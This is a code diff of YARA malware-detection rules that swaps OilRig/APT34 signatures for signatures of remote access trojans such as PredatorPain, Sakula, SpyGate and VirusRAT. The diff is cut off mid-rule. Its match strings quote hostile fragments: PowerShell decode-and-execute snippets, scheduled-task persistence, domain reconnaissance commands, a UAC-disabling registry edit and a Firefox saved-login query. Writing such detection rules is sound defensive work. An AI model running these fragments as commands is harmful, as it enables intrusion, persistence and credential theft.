-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L88-L110"
+		description = "Detects PredatorPain RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "c6670179-871d-5a57-983b-d77354e2ede9"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/PredatorPain"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L674-L702"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "861ae1696aaa89c81d04214e67d77d98ae85bd7f64ae2979fbe932dc696fd32c"
+		logic_hash = "917234f83f891ad00bd83908c244818f517ea89cf7d8c81cfc3618b8386c1804"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "c6437f57a8f290b5ec46b0933bfa8a328b0cb2c0c7fbeea7f21b770ce0250d3d"
-		hash2 = "293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "%userprofile%\\AppData\\Local\\Microsoft\\" ascii
-		$s2 = "$fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" fullword ascii
-		$s3 = "&{$rn = Get-Random; $id = 'TR" fullword ascii
-		$s4 = "') -replace '__',('DNS'+$id) | " fullword ascii
-		$s5 = "\\upd.vbs" ascii
-		$s6 = "schtasks /create /F /sc minute /mo " fullword ascii
-		$s7 = "') -replace '__',('HTP'+$id) | " fullword ascii
-		$s8 = "&{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ" fullword ascii
-		$s9 = "http://www.israirairlines.com/?mode=page&page=14635&lang=eng<" fullword ascii
+		$string1 = "holderwb.txt" wide
+		$string3 = "There is a file attached to this email" wide
+		$string4 = "screens\\screenshot" wide
+		$string5 = "Disablelogger" wide
+		$string6 = "\\pidloc.txt" wide
+		$string7 = "clearie" wide
+		$string8 = "clearff" wide
+		$string9 = "emails should be sent to you shortly" wide
+		$string10 = "jagex_cache\\regPin" wide
+		$string11 = "open=Sys.exe" wide
+		$ver1 = "PredatorLogger" wide
+		$ver2 = "EncryptedCredentials" wide
+		$ver3 = "Predator Pain" wide
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 4000KB and 2 of ( $s* ) ) or ( 4 of them )
+		7 of ( $string* ) and any of ( $ver* )
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen3 : FILE
+rule SIGNATURE_BASE_RAT_Punisher
 {
 	meta:
-		description = "Detects Oilrig malware samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1cd5f7ea-4ae6-5642-b8b3-050cfe724e69"
-		date = "2016-10-12"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L112-L129"
+		description = "Detects Punisher RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "1e16b3c7-9656-5570-afa2-542367aa14d8"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Punisher"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L704-L726"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ccc110b04ea3ee9a19ff23babbc759b4ec6114f8b5eb4f42bc5f70f8abde8a53"
+		logic_hash = "9347b8053393c3537693273c44a2a2f095928b8bc0cdcf9365a6f060d66efeb5"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9"
-		hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9"
-		hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed"
+		quality = 60
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" fullword ascii
-		$x2 = "\\Libraries\\fireueye.vbs" ascii
-		$x3 = "\\Libraries\\fireeye.vbs&" wide
+		$a = "abccba"
+		$b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73}
+		$c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73}
+		$d = "SpyTheSpy" wide ascii
+		$e = "wireshark" wide
+		$f = "apateDNS" wide
+		$g = "abccbaDanabccb"
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 100KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal2 : FILE
+rule SIGNATURE_BASE_RAT_Pythorat
 {
 	meta:
-		description = "Detects malware from OilRig Campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7a6c38e7-bed9-524b-b4a5-c6c895b9c049"
-		date = "2016-10-12"
+		description = "Detects Python RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "fc98c513-1abf-5331-b351-f6182e5b19c5"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L131-L149"
+		reference = "http://malwareconfig.com/stats/PythoRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L728-L751"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b1de7dc3c205c78825f52ea30608b10bafa2c486db53693aa90aa07138fb1a87"
+		logic_hash = "8edcfb8f234ff225537d19343c75788ec2a25940e80042751eea3280a967e166"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "65920eaea00764a245acb58a3565941477b78a7bcc9efaec5bf811573084b6cf"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii
-		$x2 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
-		$x3 = "mailto:Mohammed.sarah@gratner.com" fullword wide
-		$x4 = "mailto:Tarik.Imam@gartner.com" fullword wide
-		$x5 = "Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")" fullword ascii
-		$x6 = "2dy53My5vcmcvMjAw" fullword wide
+		$a = "TKeylogger"
+		$b = "uFileTransfer"
+		$c = "TTDownload"
+		$d = "SETTINGS"
+		$e = "Unknown" wide
+		$f = "#@#@#"
+		$g = "PluginData"
+		$i = "OnPluginMessage"
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 200KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Oilrig_Campaign_Reconnaissance : FILE
+rule SIGNATURE_BASE_RAT_Qrat
 {
 	meta:
-		description = "Detects Windows discovery commands - known from OilRig Campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a4fe24b8-290a-5a4a-9f81-bbbd9aae6c6e"
-		date = "2016-10-12"
+		description = "Detects QRAT"
+		author = "Kevin Breen @KevTheHermit"
+		id = "2ee645a3-1e01-513c-a636-098e445adeca"
+		date = "2015-01-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L151-L166"
+		reference = "http://malwareconfig.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L753-L773"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "04c9f482c0c4abc1bf316459dc3085154defadb0fd5fe74ff274d8b3ee807b7f"
+		logic_hash = "6d404153ca64b547885e4e4581205f5fc20faf86e8ab18002c5deedca2487225"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5893eae26df8e15c1e0fa763bf88a1ae79484cdb488ba2fc382700ff2cfab80c"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "jar"
 
 	strings:
-		$s1 = "whoami & hostname & ipconfig /all" ascii
-		$s2 = "net user /domain 2>&1 & net group /domain 2>&1" ascii
-		$s3 = "net group \"domain admins\" /domain 2>&1 & " ascii
+		$a0 = "e-data"
+		$a1 = "quaverse/crypter"
+		$a2 = "Qrypt.class"
+		$a3 = "Jarizer.class"
+		$a4 = "URLConnection.class"
 
 	condition:
-		( filesize < 1KB and 1 of them )
+		4 of them
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal3 : FILE
+rule SIGNATURE_BASE_RAT_Sakula : FILE
 {
 	meta:
-		description = "Detects malware from OilRig Campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5967b39-5d21-5a6a-a1b5-2ec122f16444"
-		date = "2016-10-12"
+		description = "Detects Sakula v1.0 RAT"
+		author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings"
+		id = "4be3179c-3b91-56db-bba9-9ccc42066f96"
+		date = "2015-10-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L168-L183"
+		reference = "http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L775-L817"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "62a6f6c4e574a3c577f0b1fdd85eaa3e775a7ae0e457c59a6b6f741ad895e510"
+		logic_hash = "ec4e16deb6f4a671ee665c81568e87dc9a1023328e1be242eae015c1e04cfcef"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "02226181f27dbf59af5377e39cf583db15200100eea712fcb6f55c0a2245a378"
 
 	strings:
-		$x1 = "(Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1" fullword ascii
-		$x2 = "Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')" fullword ascii
-		$x3 = "('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))" fullword ascii
+		$s1 = "%d_of_%d_for_%s_on_%s"
+		$s2 = "/c ping 127.0.0.1 & del /q \"%s\""
+		$s3 = "=%s&type=%d"
+		$s4 = "?photoid="
+		$s5 = "iexplorer"
+		$s6 = "net start \"%s\""
+		$s7 = "cmd.exe /c rundll32 \"%s\""
+		$v1_1 = "MicroPlayerUpdate.exe"
+		$v1_2 = "CCPUpdate"
+		$v1_3 = { 81 3E 78 03 00 00 75 57  8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF  15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31  41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15  24 F0 40 00 E8 0F 09 00 }
+		$v1_4 = { 50 E8 CD FC FF FF 83 C4  04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE  FE FF FF E8 13 F5 FF FF }
+		$serial01 = { 31 06 2e 48 3e 01 06 b1 8c 98 2f 00 53 18 5c 36 }
+		$serial02 = { 01 a5 d9 59 95 19 b1 ba fc fa d0 e8 0b 6d 67 35 }
+		$serial03 = { 47 d5 d5 37 2b cb 15 62 b4 c9 f4 c2 bd f1 35 87 }
+		$serial04 = { 3a c1 0e 68 f1 ce 51 9e 84 dd cd 28 b1 1f a5 42 }
+		$opcodes1 = { 89 FF 55 89 E5 83 EC 20 A1 ?? ?? ?? 00 83 F8 00 }
+		$opcodes2 = { 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B }
+		$opcodes3 = { 8B 45 08 8D 0C 02 8A 01 84 C0 74 08 3C ?? 74 04 34 ?? 88 01 }
+		$opcodes4 = { 30 14 38 8D 0C 38 40 FE C2 3B C6 }
+		$opcodes5 = { 30 14 39 8D 04 39 41 FE C2 3B CE }
+		$fp1 = "Symantec Corporation" ascii wide
 
 	condition:
-		( filesize < 10KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and ( ( 3 of ( $s* ) and any of ( $v1_* ) ) or ( any of ( $serial0* ) ) or ( any of ( $opcodes* ) ) ) and not 1 of ( $fp* )
 }
-
-rule SIGNATURE_BASE_Oilrig_Malware_Nov17_13 : FILE
+rule SIGNATURE_BASE_RAT_Shadowtech : FILE
 {
 	meta:
-		description = ""
-		author = "Florian Roth (Nextron Systems)"
-		id = "c45b8d30-6a5f-5dac-a202-6748ba7b7bd2"
-		date = "2017-11-22"
+		description = "Detects ShadowTech RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "1fb15030-b400-5e70-b183-81e2527d5556"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ClearskySec/status/933280188733018113"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L185-L206"
+		reference = "http://malwareconfig.com/stats/ShadowTech"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L819-L839"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eab15229f084681b27cec7ed959ef4cd1193a0b38aaed4341dcd6761e2505804"
+		logic_hash = "8ab024ae5ca62de30daf4392db5241220fcdb9b419bad555a996729aed9fa45d"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f1e2df85c538875a7da877719555e21c33a558ac121eb715cf4e779d77ab445"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "\\Release\\dnscat2.pdb" ascii
-		$x2 = "cscript.exe //T:20 //Nologo " fullword ascii
-		$a1 = "taskkill /F /IM cscript.exe" fullword ascii
-		$a2 = "cmd.exe /c " fullword ascii
+		$a = "ShadowTech" nocase
+		$b = "DownloadContainer"
+		$c = "MySettings"
+		$d = "System.Configuration"
+		$newline = "#-@NewLine@-#" wide
+		$split = "pSIL" wide
+		$key = "ESIL" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "0160250adfc97f9d4a12dd067323ec61" or 1 of ( $x* ) or all of ( $a* ) )
+		4 of them
 }
-rule SIGNATURE_BASE_Oilrig_Intelsecuritymanager_Macro : FILE
+rule SIGNATURE_BASE_RAT_Smallnet
 {
 	meta:
-		description = "Detects OilRig malware"
-		author = "Eyal Sela (slightly modified by Florian Roth)"
-		id = "4cccc0df-a225-5500-be55-f4ae346e066e"
-		date = "2018-01-19"
+		description = "Detects SmallNet RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "aec1f8fd-2806-527e-9d50-422f212864de"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L208-L233"
+		reference = "http://malwareconfig.com/stats/SmallNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L841-L861"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "35e540b87bb7425b601fad76f0ff33c60a4d91579fc50f5902d708d06fa755f6"
+		logic_hash = "17a6be371ce0c616cfea0b42a30e6d9118376912002d59790b133c73fd5436a3"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$one1 = "$c$m$$d$.$$" ascii wide
-		$one2 = "$C$$e$r$$t$u$$t$i$$l$" ascii wide
-		$one3 = "$$%$a$$p$p$$d$a$" ascii wide
-		$one4 = ".$t$$x$t$$" ascii wide
-		$one5 = "cu = Replace(cu, \"$\", \"\")" ascii wide
-		$one6 = "Shell Environ$(\"COMSPEC\") & \" /c"
-		$one7 = "echo \" & Chr(32) & cmd & Chr(32) & \" > \" & Chr(34)" ascii wide
-		$two1 = "& SchTasks /Delete /F /TN " ascii wide
-		$two2 = "SecurityAssist" ascii wide
-		$two3 = "vbs = \"cmd.exe /c SchTasks" ascii wide
-		$two4 = "/Delete /F /TN Conhost & del" ascii wide
-		$two5 = "NullRefrencedException" ascii wide
-		$two6 = "error has occurred in user32.dll by" ascii wide
-		$two7 = "NullRefrencedException" ascii wide
+		$split1 = "!!<3SAFIA<3!!"
+		$split2 = "!!ElMattadorDz!!"
+		$a1 = "stub_2.Properties"
+		$a2 = "stub.exe" wide
+		$a3 = "get_CurrentDomain"
 
 	condition:
-		filesize < 300KB and 1 of ( $one* ) or 2 of ( $two* )
+		($split1 or $split2 ) and ( all of ( $a* ) )
 }
-rule SIGNATURE_BASE_Oilrig_Intelsecuritymanager : FILE
+rule SIGNATURE_BASE_RAT_Spygate
 {
 	meta:
-		description = "Detects OilRig malware"
-		author = "Eyal Sela"
-		id = "4cccc0df-a225-5500-be55-f4ae346e066e"
-		date = "2018-01-19"
+		description = "Detects SpyGate RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "ed015770-81ff-5d9c-8bd0-3c225e400724"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L235-L255"
+		reference = "http://malwareconfig.com/stats/SpyGate"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L863-L890"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "97debd5e74730e22133f29c89a0cf049862459c24d1b46634a973908040db3a7"
+		logic_hash = "5b891212f3a669c6066cfddef418faafd75c92bb2f1e8e1f48403422a73bc9fa"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 83
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$one1 = "srvResesponded" ascii wide fullword
-		$one2 = "InetlSecurityAssistManager" ascii wide fullword
-		$one3 = "srvCheckresponded" ascii wide fullword
-		$one4 = "IntelSecurityManager" ascii wide
-		$one5 = "msoffice365cdn.com" ascii wide
-		$one6 = "\\tmpCa.vbs" ascii wide
-		$one7 = "AAZFinish" ascii wide fullword
-		$one8 = "AAZUploaded" ascii wide fullword
-		$one9 = "ABZFinish" ascii wide fullword
-		$one10 = "\\tmpCa.vbs" ascii wide
+		$split = "abccba"
+		$a1 = "abccbaSpyGateRATabccba"
+		$a2 = "StubX.pdb"
+		$a3 = "abccbaDanabccb"
+		$b1 = "monikerString" nocase
+		$b2 = "virustotal1"
+		$b3 = "get_CurrentDomain"
+		$c1 = "shutdowncomputer" wide
+		$c2 = "shutdown -r -t 00" wide
+		$c3 = "set cdaudio door closed" wide
+		$c4 = "FileManagerSplit" wide
+		$c5 = "Chating With >> [~Hacker~]" wide
 
 	condition:
-		filesize < 300KB and any of them
+		( all of ( $a* ) and #split > 40 ) or ( all of ( $b* ) and #split > 10 ) or ( all of ( $c* ) )
 }
-rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_1
+rule SIGNATURE_BASE_RAT_Sub7Nation
 {
 	meta:
-		description = "Detects APT34 PowerShell malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6a082c5a-ee5b-5002-9148-61bbcfedfe68"
-		date = "2019-04-17"
+		description = "Detects Sub7Nation RAT"
+		author = "Kevin Breen <kevin@techanarchy.net> (slightly modified by Florian Roth to improve performance)"
+		id = "4f41d649-4a90-566b-bda8-0a288380aeaa"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L267-L283"
+		reference = "http://malwareconfig.com/stats/Sub7Nation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L892-L913"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "afe203fdfcc9dcafb170bee972d45e66e5483a777112a00fa30516dfe81bbf88"
+		logic_hash = "bd6c423cd5cb5a86b20e5e65ab460904548b8814c92ac65e497757bb79a27681"
 		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "= get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" ascii
-		$x2 = "Write-Host \"excepton occured!\"" ascii
-		$s1 = "Start-Sleep -s 1;" fullword ascii
-		$s2 = "Start-Sleep -m 100;" fullword ascii
+		$a = "EnableLUA /t REG_DWORD /d 0 /f"
+		$i = "HostSettings"
+		$verSpecific1 = "sevane.tmp"
+		$verSpecific2 = "cmd_.bat"
+		$verSpecific3 = "a2b7c3d7e4"
+		$verSpecific4 = "cmd.dll"
 
 	condition:
-		1 of ( $x* ) or 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_2
+rule SIGNATURE_BASE_RAT_Vertex
 {
 	meta:
-		description = "Detects APT34 PowerShell malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c3bdadfd-2164-5e33-be84-d5d5de8eb048"
-		date = "2019-04-17"
+		description = "Detects Vertex RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "f6f5967e-6b88-5d95-8fe1-a286ee8ce64c"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L285-L304"
+		reference = "http://malwareconfig.com/stats/Vertex"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L915-L938"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "57c8f02ebfb05f739fc4791a88be4a981ce7b89e2bd283669f85aae1a5c14d02"
+		logic_hash = "c9fb0dedd97240ad29924865118ba34f5d79dbefbb13729d96d41336ec4de39e"
 		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "= \"http://\" + [System.Net.Dns]::GetHostAddresses(\"" ascii
-		$x2 = "$t = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" fullword ascii
-		$x3 = "| Where { $_ -notmatch '^\\s+$' }" ascii
-		$s1 = "= new-object System.Net.WebProxy($u, $true);" fullword ascii
-		$s2 = " -eq \"dom\"){$" ascii
-		$s3 = " -eq \"srv\"){$" ascii
-		$s4 = "+\"<>\" | Set-Content" ascii
+		$string1 = "DEFPATH"
+		$string2 = "HKNAME"
+		$string3 = "HPORT"
+		$string4 = "INSTALL"
+		$string5 = "IPATH"
+		$string6 = "MUTEX"
+		$res1 = "PANELPATH"
+		$res2 = "ROOTURL"
 
 	condition:
-		1 of ( $x* ) and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_3
+rule SIGNATURE_BASE_RAT_Virusrat
 {
 	meta:
-		description = "Detects APT34 PowerShell malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "361582e7-94e3-5608-9ba9-31fa20c37cf0"
-		date = "2019-04-17"
-		modified = "2023-01-06"
-		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L306-L326"
+		description = "Detects VirusRAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "ef00cec9-d09b-5010-8e7d-bb391c937f34"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/VirusRat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L940-L967"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77ba71a59d6026c4b393bc66af586066e11b0c496367a38d847396a23b3dffbe"
+		logic_hash = "8540296fe1341a793377494cec9ba6ee0313203bee9997f0da0b692959727c59"
 		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "Powershell.exe -exec bypass -file ${global:$address1}"
-		$x2 = "schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn"
-		$x3 = "\"\\UpdateTasks\\UpdateTaskHosts\""
-		$x4 = "wscript /b \\`\"${global:$address1" ascii
-		$x5 = "::FromBase64String([string]${global:$http_ag}))" ascii
-		$x6 = ".run command1, 0, false\" | Out-File " ascii
-		$x7 = "\\UpdateTask.vbs" ascii
-		$x8 = "hUpdater.ps1" fullword ascii
+		$string0 = "virustotal"
+		$string1 = "virusscan"
+		$string2 = "abccba"
+		$string3 = "pronoip"
+		$string4 = "streamWebcam"
+		$string5 = "DOMAIN_PASSWORD"
+		$string6 = "Stub.Form1.resources"
+		$string7 = "ftp://{0}@{1}" wide
+		$string8 = "SELECT * FROM moz_logins" wide
+		$string9 = "SELECT * FROM moz_disabledHosts" wide
+		$string10 = "DynDNS\\Updater\\config.dyndns" wide
+		$string11 = "|BawaneH|" wide
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Shellcode_Apihashing_FIN8_1
+rule SIGNATURE_BASE_RAT_Xtreme
 {
 	meta:
-		description = "Detects FIN8 Shellcode APIHashing"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "bca5601c-2998-545b-8dd0-ec3c861e6291"
-		date = "2021-03-16"
+		description = "Detects Xtreme RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "02b7bb6a-5d1e-5379-b366-868680844719"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin8.yar#L1-L19"
+		reference = "http://malwareconfig.com/stats/Xtreme"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L969-L990"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d47119a588aa69b3e241618d6dbb9df6117a6751bbff39a1f95340bc26611a7"
+		logic_hash = "4dec8de6609f8229444291a78e920ac48b9b5751dd0cad7c95bc6529d6f8c16c"
 		score = 75
 		quality = 85
 		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+		ver = "2.9, 3.1, 3.2, 3.5"
 
 	strings:
-		$APIHashing32bit1 = {81 F7 99 5D 52 69 81 F3 30 D7 00 AB}
-		$APIHashing32bit2 = {68 F2 55 03 88 68 65 19 6D 1E}
-		$APIHashing32bit3 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
-		$APIHashing64bit1 = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
-		$APIHashing64bit2 = {48 B8 99 5D 52 69 30 D7 00 AB}
+		$a = "XTREME" wide
